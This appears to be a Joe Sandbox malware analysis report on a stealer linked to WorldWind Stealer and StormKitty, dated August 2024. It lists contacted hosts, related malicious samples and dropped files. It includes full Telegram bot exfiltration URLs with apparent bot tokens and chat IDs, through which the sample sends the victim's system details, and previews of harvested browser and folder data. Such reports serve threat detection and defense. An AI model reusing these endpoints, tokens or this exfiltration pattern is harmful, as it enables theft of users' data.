https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... | true | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-20%205:06:19%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20506013%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201PKE1OBC%0ARAM:%204095MB%0AHWID:%205D1E7ABD56%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True | true | Avira URL Cloud: safe | unknown
https://pastebin.com/raw/7B75u64B | false | Avira URL Cloud: safe | unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabtmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/ac/?q=tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13vYz1Z2heor.exefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://api.telegram.orgvYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002633000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://api.telegram.org/botvYz1Z2heor.exetrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=57954vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002633000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://api.telegram.orgDvYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://pastebin.comdvYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B99000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • URL Reputation: safe
                                        unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJp | source: tmpD724.tmp.dat.0.dr | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://www.ecosia.org/newtab/ | source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.dr | malicious: false | URL Reputation: safe | reputation: unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | source: tmpD724.tmp.dat.0.dr | malicious: false | URL Reputation: safe | reputation: unknown
https://pastebin.com/raw/7B7P | source: vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://ac.ecosia.org/autocomplete?q= | source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.dr | malicious: false | URL Reputation: safe | reputation: unknown
https://github.com/LimerBoy/StormKitty | source: vYz1Z2heor.exe | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.dr | malicious: false | URL Reputation: safe | reputation: unknown
https://github.com/LimerBoy/StormKitty0& | source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://api.telegram.orgd | source: vYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://support.mozilla.org | source: tmpD724.tmp.dat.0.dr | malicious: false | URL Reputation: safe | reputation: unknown
https://api.telegram.org/file/bot | source: vYz1Z2heor.exe | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://api.telegram.org | source: vYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://pastebin.com | source: vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B99000.00000004.00000800.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.dr | malicious: false | URL Reputation: safe | reputation: unknown
https://pastebin.com | source: vYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795 | source: vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
172.67.19.24 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
104.16.185.241 | icanhazip.com | United States | 13335 | CLOUDFLARENETUS | false
172.67.196.114 | api.mylnikov.org | United States | 13335 | CLOUDFLARENETUS | false
                                        IP
                                        127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1495519
Start date and time: 2024-08-20 11:05:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: vYz1Z2heor.exe (renamed because the original name is a hash value)
Original Sample Name: 7f1630df6b57af024a3b561bdadc208f.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@17/90@6/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 120
• Number of non-executed functions: 8
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:06:28 | API Interceptor | 10146606x Sleep call for process: vYz1Z2heor.exe modified
Match: 149.154.167.220
Associated Sample Name / URL | Detection | Threat Name | Context
AWB 3486458032.bat.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
New Order.exe | malicious | GuLoader, Snake Keylogger |
hesaphareketi.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
Deposit Slip 20240819.exe | malicious | Snake Keylogger, VIP Keylogger |
DHL_AWB# 27069033693.exe | malicious | Snake Keylogger, VIP Keylogger |
Payment Notice.exe | malicious | AgentTesla |
file.exe | malicious | Snake Keylogger, VIP Keylogger |
lPq4mW9QT0.exe | malicious | Go Injector |
385It0O8ENqQwR3.exe | malicious | Snake Keylogger, VIP Keylogger |
copia de pago.pdf.exe | malicious | DarkCloud |

Match: 172.67.19.24
Associated Sample Name / URL | Detection | Threat Name | Context
sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
Dadebehring PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr

Match: 104.16.185.241
Associated Sample Name / URL | Detection | Threat Name | Context
WinRAR 7.01 Pro.exe | malicious | PureLog Stealer, WorldWind Stealer | icanhazip.com/
PasteHook.exe | malicious | AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig | icanhazip.com/
eEo6DAcnnx.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | icanhazip.com/
5oci4lcontract.exe | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/
viVOqZjAT0.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | icanhazip.com/
down.exe | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/
7Y18r(198).exe | malicious | Upatre | icanhazip.com/
LisectAVT_2403002B_340.exe | malicious | Bdaejec, Upatre | icanhazip.com/
LisectAVT_2403002B_4.exe | malicious | AsyncRAT, Neshta, StormKitty, WorldWind Stealer | icanhazip.com/
7Y18r(114).exe | malicious | Unknown | icanhazip.com/
Match: pastebin.com
Associated Sample Name / URL | Detection | Threat Name | Context
buidl.exe | malicious | XWorm | 172.67.19.24
Setup3.exe | malicious | Unknown | 104.20.4.235
file.exe | malicious | Unknown | 104.20.3.235
file.exe | malicious | Unknown | 104.20.4.235
SecuriteInfo.com.Win64.Evo-gen.15723.9736.exe | malicious | Unknown | 172.67.19.24
file.exe | malicious | Unknown | 104.20.4.235
file.exe | malicious | Unknown | 104.20.4.235
file.exe | malicious | Unknown | 104.20.4.235
file.exe | malicious | Cryptbot | 104.20.4.235
file.exe | malicious | Unknown | 172.67.19.24

Match: api.mylnikov.org
Associated Sample Name / URL | Detection | Threat Name | Context
WinRAR 7.01 Pro.exe | malicious | PureLog Stealer, WorldWind Stealer | 104.21.44.66
PasteHook.exe | malicious | AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig | 104.21.44.66
eEo6DAcnnx.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.196.114
83MZfLKh7D.exe | malicious | AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine | 104.21.44.66
viVOqZjAT0.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.21.44.66
LisectAVT_2403002B_4.exe | malicious | AsyncRAT, Neshta, StormKitty, WorldWind Stealer | 172.67.196.114
2U1S7Ab7YU.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.196.114
xj40xovMsm.exe | malicious | AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine | 172.67.196.114
Kh7W85ONS7.exe | malicious | AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer | 104.21.44.66
zrrHgsDzgS.exe | malicious | AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT | 104.21.44.66

Match: api.telegram.org
Associated Sample Name / URL | Detection | Threat Name | Context
AWB 3486458032.bat.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
New Order.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
hesaphareketi.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
Deposit Slip 20240819.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
DHL_AWB# 27069033693.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Payment Notice.exe | malicious | AgentTesla | 149.154.167.220
file.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
lPq4mW9QT0.exe | malicious | Go Injector | 149.154.167.220
385It0O8ENqQwR3.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
copia de pago.pdf.exe | malicious | DarkCloud | 149.154.167.220

Match: icanhazip.com
Associated Sample Name / URL | Detection | Threat Name | Context
4b27fd5c70588d922a25f658f35d5c5d3e0085ba88d9bb9b25746c52b2b58e59_dump.exe | malicious | PureLog Stealer, SmokeLoader, TrojanRansom, zgRAT | 104.16.184.241
WinRAR 7.01 Pro.exe | malicious | PureLog Stealer, WorldWind Stealer | 104.16.185.241
PasteHook.exe | malicious | AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig | 104.16.185.241
eEo6DAcnnx.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.16.185.241
83MZfLKh7D.exe | malicious | AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine | 104.16.184.241
5oci4lcontract.exe | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241
Inquiry.vbs | malicious | PXRECVOWEIWOEI Stealer | 104.16.184.241
viVOqZjAT0.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.16.185.241
down.exe | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241
7Y18r(198).exe | malicious | Upatre | 104.16.185.241
Match: TELEGRAMRU
Associated Sample Name / URL | Detection | Threat Name | Context
AWB 3486458032.bat.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
New Order.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
hesaphareketi.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
Deposit Slip 20240819.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
DHL_AWB# 27069033693.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Payment Notice.exe | malicious | AgentTesla | 149.154.167.220
file.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
lPq4mW9QT0.exe | malicious | Go Injector | 149.154.167.220
385It0O8ENqQwR3.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
copia de pago.pdf.exe | malicious | DarkCloud | 149.154.167.220

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
https://i.dhlecommerce.co.uk/kpSXQBKs | malicious | Unknown | 104.18.28.127
https://cylinder-gazelle-9pyh.squarespace.com/ | malicious | HTMLPhisher | 188.114.96.3
https://msftexperience.qualtrics.com/jfe/form/SV_b1PzoUF1L5qlw1g?Q_DL=i8Vov6mVjGVgerA_b1PzoUF1L5qlw1g_CGC_mfeOsf0MeRbL2Wx&Q_CHL=email | malicious | Unknown | 104.18.86.42
doc09125520240407073114.exe | malicious | FormBook, GuLoader | 104.21.22.240
https://cas5-0-urlprotect.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2fwww.canva.com%2fdesign%2fDAGOBu%2dr3%5fc%2fbUsM2Sfr6SrtzWJ0MuOlTA%2fview%3futm%5fcontent%3dDAGOBu%2dr3%5fc%26utm%5fcampaign%3ddesignshare%26utm%5fmedium%3dlink%26utm%5fsource%3deditor&umid=34124fae-5be2-11ef-90ef-6045bd958b11&auth=bb06dfad69550b02ce860f7670981749648d9c57-548539a071453819ed1e8beeeda5850224d87a71 | malicious | Unknown | 104.16.103.112
Transaction_Details_[PDF]_#2009TYZ.html | malicious | HTMLPhisher | 104.17.25.14
Filename.exe | malicious | DarkTortilla, FormBook | 104.21.87.201
phish_alert_sp2_2.0.0.0.eml | malicious | Unknown | 104.18.69.40
774730925310.exe | malicious | Snake Keylogger | 188.114.97.3
AWB 3486458032.bat.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
                                                            Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                            3b5074b1b5d032e5620f69f9f700ff0e
                                                                XCc5WuJdF7.exe | malicious | Zhark RAT | 149.154.167.220, 172.67.196.114, 172.67.19.24
                                                                https://poczta.i-host.pl/ | malicious | Unknown | 149.154.167.220, 172.67.196.114, 172.67.19.24
                                                                https://api.wiw.io/public/twitter-card?image_url=https://static.wiw.io/prod/twitter-card-image/profile/92a86cbc-de1a-4d11-816f-1c8c68b24c0c-c1038513&redirect_url=https://flagstoreu9049060048844.s3.amazonaws.com/index.html | malicious | Unknown | 149.154.167.220, 172.67.196.114, 172.67.19.24
                                                                Transaction_Details_[PDF]_#2009TYZ.html | malicious | HTMLPhisher | 149.154.167.220, 172.67.196.114, 172.67.19.24
                                                                AWB 3486458032.bat.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220, 172.67.196.114, 172.67.19.24
                                                                New Order.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220, 172.67.196.114, 172.67.19.24
                                                                sz4ypfkelT.exe | malicious | Unknown | 149.154.167.220, 172.67.196.114, 172.67.19.24
                                                                V58VVR64wc.exe | malicious | Unknown | 149.154.167.220, 172.67.196.114, 172.67.19.24
                                                                wiXku8sNM3.exe | malicious | Unknown | 149.154.167.220, 172.67.196.114, 172.67.19.24
                                                                l6UA0MG4eo.exe | malicious | Unknown | 149.154.167.220, 172.67.196.114, 172.67.19.24
                                                            No context
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:0
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                            Category:dropped
                                                            Size (bytes):119304
                                                            Entropy (8bit):7.926106958300375
                                                            Encrypted:false
                                                            SSDEEP:3072:/+C0uma+mU5V8OiKRuKsimbrUGWbY61Y7:fOiKRuKHDGWU
                                                            MD5:FC8376B971568FBC83D9CF5B143ABDD8
                                                            SHA1:C4F535885847F6693A0272F5AE737AB49F572BD2
                                                            SHA-256:B7DA80468862EDC06DB6D39F44C714C669F0B2B60407D4177D8DF60C84BDECA4
                                                            SHA-512:44398D5AC56B65BA2E59184E6A57ACDDE8C10BB21ED3BF5170BC2E99845BA01EFEE59B0B43D8BA9F4BB5EFDE0453720A22FF58FF089F4BF3BAAB0857440B34EF
                                                            Malicious:false
                                                            Preview:PK.........M.Y................Browsers\Edge\PK.........M.Y................Browsers\Google\PK.........(.YQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK.........(.Yc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.*3''QA..L#.....J_...\/.".._........_....1M_S....PK.........(.Y^.......5.......Directories\Desktop.txte..N.0...g.4Q......kKm...m..q...^....w='..;........[....K...f...v..5.WL.F!_..gM.*+0.k.]p..;-yI.z.gG.l.By..w....X".N....)D3.UqlUx....hyV......k.*.t.4...?.5xAyU.(WQ9...l...XN-f.......3.K..2.:t.?.M_@...P......Emw..`}0>........q........E....PK.........(.Y9..%............Directories\Documents.txtmR.n.0.<S.../._@lp.0/c((......T..&IC..g......S..q8<?.DJ..mn..- *..)+.qB=?.Q_.ifO....=..w.8..`..~f....X...._4.S.xB:~....[SFY..v....3..3.w..o.4T..T.....j..SP..tR.>.>6.t.D]].xUn..*...K...*U7.3.K..6`2c.10.J.X......%.0...o.Y~.%A...........Q.f^........-@.P.......r.....
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):105
                                                            Entropy (8bit):3.8863455911790052
                                                            Encrypted:false
                                                            SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                            MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                            SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                            SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                            SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                            Malicious:false
                                                            Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-8 text
                                                            Category:dropped
                                                            Size (bytes):94
                                                            Entropy (8bit):4.886397362842801
                                                            Encrypted:false
                                                            SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                            MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                            SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                            SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                            SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                            Malicious:false
                                                            Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):565
                                                            Entropy (8bit):5.263142154940491
                                                            Encrypted:false
                                                            SSDEEP:12:wvTj4VjWi/O+F8/VjKb6dl1AbALKpjYejKy/dIy/D/MPDOlb:CEROJXEbXNY8XFIyjMPDOlb
                                                            MD5:4DDB7297D80BFCC588C29E5850D8E43A
                                                            SHA1:2BEA7960EAE2FABB914C880FE49A83F05688E307
                                                            SHA-256:9C76D7DCD18008DFBA8921600ED1A1A8DDE431994775BA1D168C92DA586E07CB
                                                            SHA-512:13B7E7861574ADDE713FD0C573CBEA0878B025E6EBAE3E0D501ABF14DAB8E0EA45740B8BFA03D991B2A7CE71CCDC1CCE853ED6C777C478258BA016A0940D6ED9
                                                            Malicious:false
                                                            Preview:Desktop\...DUUDTUBZFW\....DUUDTUBZFW.docx....EWZCVGNOWT.pdf....JDDHMPCDUJ.png....KLIZUSIQEN.jpg....NYMMPCEIMA.mp3....ZGGKNSUKOP.xlsx...GIGIYTFFYT\...GLTYDMDUST\...KLIZUSIQEN\...NWCXBPIUYI\...PALRGUCVEH\....DUUDTUBZFW.xlsx....EIVQSAOTAQ.png....EOWRVPQCCS.pdf....EWZCVGNOWT.mp3....PALRGUCVEH.docx....ZGGKNSUKOP.jpg...desktop.ini...DUUDTUBZFW.docx...DUUDTUBZFW.xlsx...EIVQSAOTAQ.png...EOWRVPQCCS.pdf...EWZCVGNOWT.mp3...EWZCVGNOWT.pdf...Excel.lnk...JDDHMPCDUJ.png...KLIZUSIQEN.jpg...NYMMPCEIMA.mp3...PALRGUCVEH.docx...vYz1Z2heor.exe...ZGGKNSUKOP.jpg...ZGGKNSUKOP.xlsx..
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):690
                                                            Entropy (8bit):5.343010195212258
                                                            Encrypted:false
                                                            SSDEEP:12:QVj4VjWi/O+FdPLKQ4wRLKTLKBLKMkLKV/VjKb6dl1AbALKpjYejKy/dIy/D/llb:QJEROxxrqEETXEbXNY8XFIyjllb
                                                            MD5:0A76925D624332C8FECC8A1D4CA7A027
                                                            SHA1:60206C224FE9EA68C353CC2E8930B9A5D60165B2
                                                            SHA-256:13DDD8403B644B0E4F6F34C01DB9AF654996F67E64290526689CD423A5D1666B
                                                            SHA-512:40974137B7785F8D3F3998593780976F29080EB3C18AD926AEBF1D73877CD2639621C4CD7E1E7DFF5B89016F53267D116317E91DBD9953A867B7B7A778A38715
                                                            Malicious:false
                                                            Preview:Documents\...DUUDTUBZFW\....DUUDTUBZFW.docx....EWZCVGNOWT.pdf....JDDHMPCDUJ.png....KLIZUSIQEN.jpg....NYMMPCEIMA.mp3....ZGGKNSUKOP.xlsx...GIGIYTFFYT\...GLTYDMDUST\...KLIZUSIQEN\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NWCXBPIUYI\...PALRGUCVEH\....DUUDTUBZFW.xlsx....EIVQSAOTAQ.png....EOWRVPQCCS.pdf....EWZCVGNOWT.mp3....PALRGUCVEH.docx....ZGGKNSUKOP.jpg...desktop.ini...DUUDTUBZFW.docx...DUUDTUBZFW.xlsx...EIVQSAOTAQ.png...EOWRVPQCCS.pdf...EWZCVGNOWT.mp3...EWZCVGNOWT.pdf...JDDHMPCDUJ.png...KLIZUSIQEN.jpg...NYMMPCEIMA.mp3...PALRGUCVEH.docx...ZGGKNSUKOP.jpg...ZGGKNSUKOP.xlsx..
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):234
                                                            Entropy (8bit):5.2549380936207095
                                                            Encrypted:false
                                                            SSDEEP:6:3tSLKIajYbaj8jsB/cssI/wy/EI/To0kCOCc1G5bLv:QLKpjYejKy/dIy/D/llb
